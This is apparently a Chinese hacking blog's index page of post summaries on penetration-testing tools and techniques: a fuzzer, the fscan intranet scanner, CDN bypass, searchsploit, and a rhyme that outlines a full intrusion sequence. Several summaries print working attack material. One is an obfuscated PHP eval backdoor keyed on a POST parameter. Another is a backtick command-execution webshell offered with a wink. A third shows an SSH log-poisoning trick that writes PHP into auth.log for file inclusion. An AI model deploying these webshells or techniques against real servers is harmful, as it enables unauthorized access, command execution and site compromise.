摘要:
国外网站看到的。 简贴一下谷歌翻译的介绍 是什么让这个工具与其他工具不同: 它被写入异步工作,允许达到最大限制。所以它非常快。 校准模式,自行应用过滤器 有一堆标志可以帮助你详细地模糊 给定状态代码和深度的递归扫描模式 报告世代,你可以稍后去检查你的结果 多个 url 扫描 安装 git clone 阅读全文
摘要:
一:老黑客三字经 进谷歌 找注入没注入 就旁注没旁注 用Oday没Oday 猜目录没目录 就嗅探爆账户 找后台传小马 放大马拿权限 挂页面放暗链 清数据 二:新黑客三字经 搞企业 先扫描扫描器 商业好默密码 都知道社工库 找一找邮箱号 先列好九头蛇 跑一跑搞不定 放大招发邮件 凭伪造没邮箱 搞网站二 阅读全文
摘要:
python -m SimpleHTTPServer 8888 使用上面的命令可以把当前目录发布到8888端口。 直接浏览器访问 但是这条命令是当前运行的,不是后台运行的,也就是说如果Ctrl + C,则该端口就会关闭。 python -m SimpleHTTPServer 8888 & 在上述命令 阅读全文
摘要:
fscan简介 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能 主要功能 1.信息搜集: 存活探测( 阅读全文
摘要:
<?php if(isset($_REQUEST['phpsessid'])){ class A { static $d; } class B extends A { } A::$d =base64_decode(substr($_POST['key'],3)); eval(B::$d); } ?> 阅读全文
摘要:
这是一篇全网(无论国内还是国外)最全、最详细、最新、最实用的关于 CDN 网络对抗攻击的文章,渗透测试中若碰到 CDN 类的问题,只需要看这一篇指南即可。我也会在 Github (https://github.com/bin-maker/2021CDN/)长期保持此文的更新,更新与修正新的对抗技术、 阅读全文
摘要:
今天看文章学了一招,有包含漏洞无法传文件的时候用 目标服务器环境为ubuntu,ssh登录日志文件是/var/log/auth.log 找个Linux的环境执行ssh '<? phpinfo(); ?>'@192.168.48.129 这个时候我们看下auth.log里面有什么 PHP代码被成功写入 阅读全文
摘要:
搬瓦攻方案库存监控页面 https://stock.bwg.net/ https://bwh81.net/ https://bandwagonhost.com/ https://teddysun.com/602.html 阅读全文
摘要:
kali里面自带这个工具,用来搜索www.exploit-db.com上面的漏洞库,在由于是提前内置了数据库所以不联网也可以用。 使用之前先更新一下确保是最新的漏洞库 searchsploit --update 搜索程序漏洞 searchsploit 程序名 查看结果 searchsploit -m 阅读全文
摘要:
<?php $evil=`set`; echo '<pre>'.$evil.'</pre>'; ?> 成功执行set命令,你懂的! 顺手写了个php执行cmd命令的马,保存为1.php <!DOCTYPE html> <html> <head> <title></title> </head> <bo 阅读全文